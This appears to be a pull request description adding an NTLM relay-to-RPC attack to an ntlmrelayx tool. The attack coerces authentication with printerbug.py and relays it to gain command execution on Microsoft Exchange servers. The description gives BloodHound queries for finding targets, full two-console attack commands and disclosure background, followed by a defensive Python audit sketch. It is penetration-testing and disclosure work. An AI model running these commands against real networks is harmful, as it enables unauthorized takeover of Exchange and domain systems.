Hello there,
This PR implements the Relaying to RPC attack, which currently allows RCE in any MS Exchange via the Exchange Trusted Subsystem group (all Exchange systems have Administrator rights to each other via this or a similar group) and printerbug.py.
BloodHound queries to find vulnerable machines
MATCH p=(a:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(b:Computer) RETURN p
MATCH p=(a:Computer)-[r:AdminTo]->(b:Computer) RETURN p
Usage
Relaying to ncacn_ip_tcp:
# Console 1
sudo python2 ntlmrelayx.py -debug -c whoami -t rpc://EXCHANGE1-ADDR
# Console 2
python2 ./printerbug.py test@EXCHANGE2-ADDR {your_ip}
Relaying to IPC$ (low-privileged account needed), but requires only 445/tcp, and the connection will be encrypted:
# Console 1
sudo python2 ntlmrelayx.py -c whoami -t rpc://EXCHANGE1-ADDR -rpc-use-smb -auth-smb 'CONTOSO/test:P@ssw0rd'
# Console 2
python2 ./printerbug.py test@EXCHANGE2-ADDR {your_ip}
Description
My original complete patch: https://gist.github.com/mohemiv/ab542e4ff5d8fedda790e35326705bad
MD5SUM from May 2, 2020: https://twitter.com/_mohemiv/status/1256636651780087809
The supported functions:
IPC$
Also I've tested relaying connections to MMC20 object, but relaying to DCOM will give you only the relayed user permissions, in my PoC it required 2 connections from the target, and there is no way to launch a DCOM object via only 445/tcp. So, the full PoC for DCOM has not been developed. Relaying to WMI is not possible as WMI requires signing.
As you already know, Compass Security company has already published the description of this attack ( https://twitter.com/compasssecurity/status/1260898906629529602 ), but as I know from MS, the patch is not fully developed yet. Maybe it is because of the IPC$ and MMC20 examples I sent via MSRC.
For @CompassSecurity, it will be interesting to see your RPC Server and ways to get an incoming RPC connection
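An added example, not part of the original PR or of the project's code: for an audit where the collected edges are available as plain lists rather than in Neo4j, this Python sketch reproduces what the two BloodHound queries above look for, so that computer accounts holding local administrator rights on other machines can be listed and those rights removed. The edge lists, the host names and the group "Exchange Servers Admins" are constructed sample data, and the function name is hypothetical.

```python
from collections import defaultdict

# Constructed sample edges in BloodHound's vocabulary (not real data).
MEMBER_OF = [
    ("EXCHANGE1$", "Exchange Trusted Subsystem"),
    ("EXCHANGE2$", "Exchange Trusted Subsystem"),
    ("Exchange Trusted Subsystem", "Exchange Servers Admins"),  # nested group
    ("WS01$", "Domain Computers"),
]
ADMIN_TO = [
    ("Exchange Servers Admins", "EXCHANGE1$"),
    ("Exchange Servers Admins", "EXCHANGE2$"),
    ("BACKUP1$", "FILE1$"),  # direct computer-to-computer admin right
]
COMPUTERS = {"EXCHANGE1$", "EXCHANGE2$", "WS01$", "BACKUP1$", "FILE1$"}


def computer_admin_paths(member_of, admin_to, computers):
    """Return {(source computer, target computer): via} for every computer
    account that is admin on another computer, either directly or through
    nested group membership (the MemberOf*1.. part of the first query).
    Unlike the Cypher queries, a computer's rights on itself are skipped."""
    parents = defaultdict(set)
    for child, group in member_of:
        parents[child].add(group)
    rights = defaultdict(set)
    for principal, target in admin_to:
        rights[principal].add(target)

    findings = {}
    for comp in sorted(computers):
        # Walk group nesting iteratively; 'seen' guards against membership cycles.
        seen, stack = {comp}, [comp]
        while stack:
            node = stack.pop()
            for target in rights.get(node, ()):
                if target in computers and target != comp:
                    findings.setdefault((comp, target), "direct" if node == comp else node)
            for group in parents.get(node, ()):
                if group not in seen:
                    seen.add(group)
                    stack.append(group)
    return findings


if __name__ == "__main__":
    result = computer_admin_paths(MEMBER_OF, ADMIN_TO, COMPUTERS)
    for (src, dst), via in sorted(result.items()):
        print(f"{src} is admin on {dst} (via {via})")
```

Each reported pair is a machine account whose relayed authentication would carry administrator rights on the target, which makes these the rights to review first.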